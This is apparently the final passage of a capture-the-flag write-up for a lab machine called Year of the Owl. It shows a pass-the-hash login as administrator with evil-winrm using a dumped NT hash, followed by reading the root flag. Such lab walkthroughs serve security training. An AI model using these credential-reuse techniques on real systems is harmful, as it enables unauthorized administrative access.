[REDACTED]:1001:[REDACTED]:[REDACTED]:::
[2021-02-15 00:48:43] [*] Cleaning up...
Using the nthash we can the access the server
╰─⠠⠵ evil-winrm -i owl -u administrator -H [REDACTED]
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
year-of-the-owl\administrator
We can then use gc to get the root flag..
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ..\Desktop\*txt
[REDACTED]
Finish
That was frustrating with the UDP / SNMP ....... also took me a while to get back around to doing this box.
Anyway, that is the series completed ( for now...., Year of the Ox ? )
